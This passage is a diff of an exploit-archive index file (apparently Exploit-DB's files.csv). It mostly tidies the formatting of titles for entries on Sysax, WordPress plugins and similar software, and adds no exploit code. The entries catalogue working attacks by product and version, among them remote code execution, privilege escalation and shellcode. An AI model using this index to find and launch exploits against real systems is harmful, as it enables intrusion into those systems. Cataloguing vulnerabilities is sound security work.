Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 +17207,platforms/php/webapps/17207.txt,"WordPress Plugin ajax category dropdown 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 17211,platforms/php/webapps/17211.txt,"mySeatXT 0.1781 SQL Injection Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 - (PluginController.php) Local File Inclusion Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 17213,platforms/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0 @@ -15933,7 +15934,7 @@ id,file,description,date,author,platform,type,port 18975,platforms/php/webapps/18975.rb,"Log1 CMS writeInfo() PHP Code Injection",2012-06-03,metasploit,php,webapps,0 18976,platforms/php/dos/18976.php,"PHP 5.3.10 - spl_autoload() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution",2012-01-18,metasploit,windows,remote,0 -18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 Create Folder BOF",2012-01-18,"Craig Freyman",windows,remote,0 +18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder BOF",2012-01-18,"Craig Freyman",windows,remote,0 18383,platforms/php/webapps/18383.txt,"pGB 2.12 kommentar.php SQL Injection Vulnerability",2012-01-18,3spi0n,php,webapps,0 18384,platforms/php/webapps/18384.txt,"PhpBridges Blog System members.php SQL Injection",2012-01-18,3spi0n,php,webapps,0 18385,platforms/php/webapps/18385.txt,"DZCP (deV!L_z Clanportal) Gamebase Addon - SQL Injection Vulnerability",2012-01-18,"Easy Laster",php,webapps,0 @@ -16012,7 +16013,7 @@ id,file,description,date,author,platform,type,port 18471,platforms/windows/local/18471.c,"TORCS <= 1.3.2 xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0 18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Include Vulnerability",2012-02-08,Vulnerability-Lab,multiple,webapps,0 18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 BSOD",2012-02-09,shinnai,windows,dos,0 -18476,platforms/windows/remote/18476.py,"Sysax Multi Server <= 5.52 File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 +18476,platforms/windows/remote/18476.py,"Sysax Multi Server <= 5.52 - File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow",2012-02-10,metasploit,windows,remote,0 18479,platforms/windows/remote/18479.rb,"Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",2012-02-10,metasploit,windows,remote,0 18480,platforms/php/webapps/18480.txt,"Dolibarr CMS 3.2.0 - Alpha - File Include Vulnerabilities",2012-02-10,Vulnerability-Lab,php,webapps,0 @@ -16062,8 +16063,8 @@ id,file,description,date,author,platform,type,port 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - (.pls) Stack Buffer Overflow",2012-03-02,metasploit,windows,local,0 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow Vulnerability",2012-02-27,Vulnerability-Lab,windows,local,0 -18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 -18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 +18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 +18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 - SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 18536,platforms/php/webapps/18536.txt,"WebfolioCMS <= 1.1.4 - CSRF (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,metasploit,windows,remote,0 @@ -16085,7 +16086,7 @@ id,file,description,date,author,platform,type,port 18554,platforms/php/webapps/18554.txt,"Timesheet Next Gen 1.5.2 - Multiple SQLi",2012-03-03,G13,php,webapps,0 18555,platforms/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Buffer Overflow Vulnerability",2012-03-03,Vulnerability-Lab,windows,remote,0 18556,platforms/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x & 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps,0 -18557,platforms/windows/remote/18557.rb,"Sysax 5.53 SSH Username Buffer Overflow (Metasploit)",2012-03-04,metasploit,windows,remote,0 +18557,platforms/windows/remote/18557.rb,"Sysax 5.53 - SSH Username Buffer Overflow (Metasploit)",2012-03-04,metasploit,windows,remote,0 18558,platforms/php/webapps/18558.txt,"DZCP (deV!L_z Clanportal) Witze Addon 0.9 - SQL Injection Vulnerability",2012-03-04,"Easy Laster",php,webapps,0 18559,platforms/php/webapps/18559.txt,"AneCMS 2e2c583 - LFI Exploit",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0 18566,platforms/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",asp,webapps,0 @@ -16164,7 +16165,7 @@ id,file,description,date,author,platform,type,port 18655,platforms/php/webapps/18655.php,"phpFox <= 3.0.1 (ajax.php) Remote Command Execution Exploit",2012-03-23,EgiX,php,webapps,0 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - (.m3u) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 -18695,platforms/windows/remote/18695.py,"sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 +18695,platforms/windows/remote/18695.py,"Sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow_",2012-03-24,metasploit,windows,remote,0 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0 18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0 @@ -16376,7 +16377,7 @@ id,file,description,date,author,platform,type,port 18935,platforms/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQLi Vulnerabilities",2012-05-27,loneferret,php,webapps,0 18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability",2012-05-28,metasploit,linux,remote,0 18937,platforms/php/webapps/18937.txt,"PBBoard 2.1.4 - Local File Inclusion",2012-05-28,n4ss1m,php,webapps,0 -18981,platforms/windows/local/18981.txt,"Sysax <= 5.60 Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0 +18981,platforms/windows/local/18981.txt,"Sysax <= 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0 18944,platforms/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injection Vulnerabilities",2012-05-28,loneferret,php,webapps,0 18945,platforms/windows/dos/18945.txt,"WinRadius Server 2009 - Denial of Service",2012-05-29,demonalex,windows,dos,0 18946,platforms/windows/dos/18946.txt,"Tftpd32 DNS Server 4.00 - Denial of Service",2012-05-29,demonalex,windows,dos,0 @@ -16683,7 +16684,7 @@ id,file,description,date,author,platform,type,port 19290,platforms/multiple/dos/19290.txt,"Airlock WAF 4.2.4 Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",multiple,dos,0 19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer <= 6.4.017 - Stack Buffer Overflow Vulnerability",2012-06-19,metasploit,windows,remote,0 19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilites",2012-06-19,Vulnerability-Lab,php,webapps,0 -19293,platforms/windows/local/19293.py,"Sysax <= 5.62 Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0 +19293,platforms/windows/local/19293.py,"Sysax <= 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0 19294,platforms/php/webapps/19294.txt,"WordPress Schreikasten 0.14.13 - XSS",2012-06-20,"Henry Hoggard",php,webapps,0 19295,platforms/windows/remote/19295.rb,"Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",2012-06-20,metasploit,windows,remote,0 19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal Vulnerability",1999-11-04,"Ussr Labs",windows,remote,0 @@ -17998,7 +17999,6 @@ id,file,description,date,author,platform,type,port 20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 (index.php id parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0 20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload Vulnerability",2012-08-22,metasploit,php,webapps,0 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Stored XSS",2012-08-20,"Shai rod",php,webapps,0 -20676,platforms/windows/remote/20676.rb,"Sysax Multi-Server 5.64 Create Folder Buffer Overflow",2012-08-20,"Matt Andreko",windows,remote,0 20677,platforms/windows/webapps/20677.txt,"IOServer _Root Directory_ Trailing Backslash Multiple Vulnerabilities",2012-08-20,hinge,windows,webapps,0 20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow Vulnerability (1)",2001-03-08,anonymous,unix,local,0 20679,platforms/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Buffer Overflow Vulnerability (2)",2001-03-08,"the itch",unix,local,0 @@ -18022,7 +18022,7 @@ id,file,description,date,author,platform,type,port 20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched Long Error Message Buffer Overflow Vulnerability",2001-03-19,"Luciano Rocha",unix,local,0 20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0 20708,platforms/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQLi Vulnerability",2012-08-21,loneferret,php,webapps,0 -20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 Create Folder Buffer Overflow",2012-08-21,metasploit,windows,remote,0 +20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow",2012-08-21,metasploit,windows,remote,0 20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0 20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal Vulnerability",2001-03-27,"UkR hacking team",cgi,remote,0 20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 Logging Output File Vulnerability",2001-03-23,KimYongJun,solaris,local,0 @@ -18218,7 +18218,7 @@ id,file,description,date,author,platform,type,port 20912,platforms/windows/remote/20912.txt,"Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification Vulnerability",2001-06-12,"SNS Advisory",windows,remote,0 20913,platforms/php/webapps/20913.txt,"Disqus Blog Comments Blind SQL Injection Vulnerability",2012-08-29,Spy_w4r3,php,webapps,0 20914,platforms/cgi/remote/20914.pl,"cgiCentral WebStore 400 Administrator Authentication Bypass Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0 -20915,platforms/windows/local/20915.py,"ActFax 4.31 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0 +20915,platforms/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0 20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 - Arbitrary Command Execution Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0 20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability",2012-08-29,Ciph3r,windows,dos,0 20918,platforms/php/webapps/20918.txt,"WordPress HD Webplayer 1.1 - SQL Injection Vulnerability",2012-08-29,JoinSe7en,php,webapps,0 @@ -23511,7 +23511,7 @@ id,file,description,date,author,platform,type,port 26374,platforms/windows/remote/26374.txt,"Xerver 4.17 Single Dot File Request Source Disclosure",2005-10-19,"Ziv Kamir",windows,remote,0 26375,platforms/windows/remote/26375.txt,"Xerver 4.17 - Forced Directory Listing",2005-10-19,"Ziv Kamir",windows,remote,0 26376,platforms/windows/remote/26376.txt,"Xerver 4.17 Server URI Null Character XSS",2005-10-19,"Ziv Kamir",windows,remote,0 -26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - Modules.PHP Remote Directory Traversal Vulnerability",2005-10-19,sp3x@securityreason.com,php,webapps,0 +26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - Modules.PHP Remote Directory Traversal Vulnerability",2005-10-19,sp3x@securityreason.com,php,webapps,0 26378,platforms/php/webapps/26378.txt,"Chipmunk Forum newtopic.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum quote.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26380,platforms/php/webapps/26380.txt,"Chipmunk Forum recommend.php ID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 @@ -33180,9 +33180,9 @@ id,file,description,date,author,platform,type,port 36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0 36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 Cross Site Request Forgery Vulnerability",2012-02-13,MustLive,hardware,remote,0 36768,platforms/php/webapps/36768.txt,"ProWiki 'id' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0 -36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 -36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 -36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 +36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal - prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 +36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal - prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 +36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal - team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 36772,platforms/cgi/webapps/36772.txt,"EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability",2012-02-13,chippy1337,cgi,webapps,0 36773,platforms/windows/dos/36773.c,"Microsoft Window - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0 36774,platforms/php/webapps/36774.txt,"WordPress MiwoFTP Plugin 1.0.5 - Arbitrary File Download Exploit",2015-04-15,"Necmettin COSKUN",php,webapps,0 @@ -33852,7 +33852,7 @@ id,file,description,date,author,platform,type,port 37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0 37546,platforms/linux/dos/37546.pl,"File Roller v3.4.1 - DoS PoC",2015-07-09,Arsyntex,linux,dos,0 37563,platforms/php/webapps/37563.html,"WordPress G-Lock Double Opt-in Manager Plugin SQL Injection Vulnerability",2012-08-01,BEASTIAN,php,webapps,0 -37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0 +37492,platforms/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0 37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80 37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0 37494,platforms/php/webapps/37494.txt,"WordPress S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0 @@ -34025,7 +34025,7 @@ id,file,description,date,author,platform,type,port 37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 37684,platforms/php/webapps/37684.html,"PrestaShop <= 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,dos,0 -37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,hyp3rlinx,multiple,webapps,0 +37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G 3.0.1.4912 - CSRF Vulnerability",2015-07-24,hyp3rlinx,multiple,webapps,0 37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0 37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0 37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0 @@ -34038,7 +34038,7 @@ id,file,description,date,author,platform,type,port 37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0 37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross Site Scripting Vulnerability",2012-09-05,"High-Tech Bridge",php,webapps,0 37699,platforms/windows/local/37699.py,"Foxit Reader - PNG Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0 -37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0 +37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G 3.0.1.4912 - Persistent XSS & Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0 37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0 37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Local Privilege Escalation",2015-08-18,kpwn,osx,local,0 @@ -34238,7 +34238,7 @@ id,file,description,date,author,platform,type,port 37895,platforms/win64/shellcode/37895.asm,"Win2003 x64 - Token Stealing shellcode - 59 bytes",2015-08-20,"Fitzl Csaba",win64,shellcode,0 37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin 'id' Parameter Cross Site Scripting Vulnerability",2012-09-26,"Scott Herbert",php,webapps,0 37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 Denial of Service Vulnerability",2012-09-27,"Ryuzaki Lawlet",linux,dos,0 -37898,platforms/windows/local/37898.py,"Reaver Pro Local Privilege Escalation Vulnerability",2012-09-30,infodox,windows,local,0 +37898,platforms/linux/local/37898.py,"Reaver Pro - Local Privilege Escalation Vulnerability",2012-09-30,infodox,linux,local,0 37899,platforms/php/webapps/37899.txt,"Switchvox Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0 37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0 37901,platforms/php/webapps/37901.txt,"AlamFifa CMS 'user_name_cookie' Parameter SQL Injection Vulnerability",2012-09-30,L0n3ly-H34rT,php,webapps,0 @@ -34336,7 +34336,7 @@ id,file,description,date,author,platform,type,port 38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection Vulnerability",2012-11-07,"High-Tech Bridge",php,webapps,0 38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 -38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22 +38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22 38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness",2012-11-08,"Sooel Son",php,webapps,0 38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server 'where' Form Field SQL Injection Vulnerability",2012-11-09,anonymous,multiple,webapps,0 38017,platforms/php/webapps/38017.txt,"WordPress Kakao Theme 'ID' Parameter SQL Injection Vulnerability",2012-11-09,sil3nt,php,webapps,0 @@ -34493,7 +34493,7 @@ id,file,description,date,author,platform,type,port 38184,platforms/php/webapps/38184.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - SEH Overwrite Buffer Overflow",2015-09-15,Un_N0n,windows,local,0 38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0 -38187,platforms/php/webapps/38187.txt,"WordPress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80 +38187,platforms/php/webapps/38187.txt,"WordPress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80 38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80 38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0 38190,platforms/jsp/webapps/38190.txt,"Openfire 3.10.2 - Privilege Escalation",2015-09-15,hyp3rlinx,jsp,webapps,80 @@ -34599,7 +34599,7 @@ id,file,description,date,author,platform,type,port 38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 Local Buffer Overflow Privilege Escalation Vulnerability",2012-02-25,"Nikita Tarakanov",windows,local,0 38300,platforms/php/webapps/38300.txt,"WordPress Audio Player Plugin 'playerID' Parameter Cross Site Scripting Vulnerability",2013-01-31,hiphop,php,webapps,0 38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme 'tab' Parameter Cross Site Scripting Vulnerability",2013-02-09,"Henrique Montenegro",php,webapps,0 -38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot Remote Code Execution",2015-09-23,metasploit,multiple,remote,6667 +38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution",2015-09-23,metasploit,multiple,remote,6667 38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation via DMG Install Script",2015-09-23,"Yorick Koster",osx,local,0 38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0 38447,platforms/multiple/local/38447.pl,"libsndfile 1.0.25 - Heap Overflow",2015-10-13,"Marco Romano",multiple,local,0 @@ -34656,7 +34656,7 @@ id,file,description,date,author,platform,type,port 38357,platforms/linux/local/38357.c,"rpi-update Insecure Temporary File Handling and Security Bypass Vulnerabilities",2013-02-28,Technion,linux,local,0 38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center 'topoContent.jsf' Cross Site Scripting Vulnerability",2013-03-04,"Julien Ahrens",java,webapps,0 38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting Vulnerability",2013-03-05,alejandr0.m0f0,php,webapps,0 -38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0 +38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0 38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,metasploit,multiple,remote,0 38401,platforms/windows/remote/38401.rb,"Kaseya VSA uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0 38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0 @@ -34857,7 +34857,7 @@ id,file,description,date,author,platform,type,port 38571,platforms/php/webapps/38571.txt,"mkCMS 'index.php' Arbitrary PHP Code Execution Vulnerability",2013-06-11,"CWH Underground",php,webapps,0 38573,platforms/php/webapps/38573.txt,"eBay Magento <= 1.9.2.1 - PHP FPM XML eXternal Entity Injection",2015-10-30,"Dawid Golunski",php,webapps,0 38574,platforms/php/webapps/38574.html,"PHP Server Monitor 3.1.1- CSRF Privilege Escalation",2015-10-30,hyp3rlinx,php,webapps,0 -38575,platforms/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",hardware,webapps,0 +38575,platforms/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",hardware,webapps,0 38576,platforms/aix/local/38576.sh,"AIX 7.1 - lquerylv Local Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0 38577,platforms/php/webapps/38577.txt,"Pligg CMS 2.0.2 - Multiple SQL Injection Vulnerabilities",2015-10-30,"Curesec Research Team",php,webapps,0 38578,platforms/php/webapps/38578.txt,"Pligg CMS 2.0.2 - Directory Traversal",2015-10-30,"Curesec Research Team",php,webapps,0 @@ -35137,11 +35137,11 @@ id,file,description,date,author,platform,type,port 38864,platforms/php/webapps/38864.php,"NeoBill /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0 38865,platforms/php/webapps/38865.txt,"NeoBill /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0 39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <=11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80 -38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 -38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download v1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0 -38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress v1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 +38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 +38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0 +38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 38870,platforms/php/webapps/38870.txt,"WordPress Easy Career Openings Plugin 'jobid' Parameter SQL Injection Vulnerability",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0 -38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance <= v8.6.1- Insecure File Permissions",2015-12-06,loneferret,windows,local,0 +38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance <= 8.6.1- Insecure File Permissions",2015-12-06,loneferret,windows,local,0 38872,platforms/php/webapps/38872.php,"WordPress PhotoSmash Galleries Plugin 'bwbps-uploader.php' Arbitrary File Upload Vulnerability",2013-12-08,"Ashiyane Digital Security Team",php,webapps,0 38873,platforms/php/webapps/38873.txt,"eduTrac 'showmask' 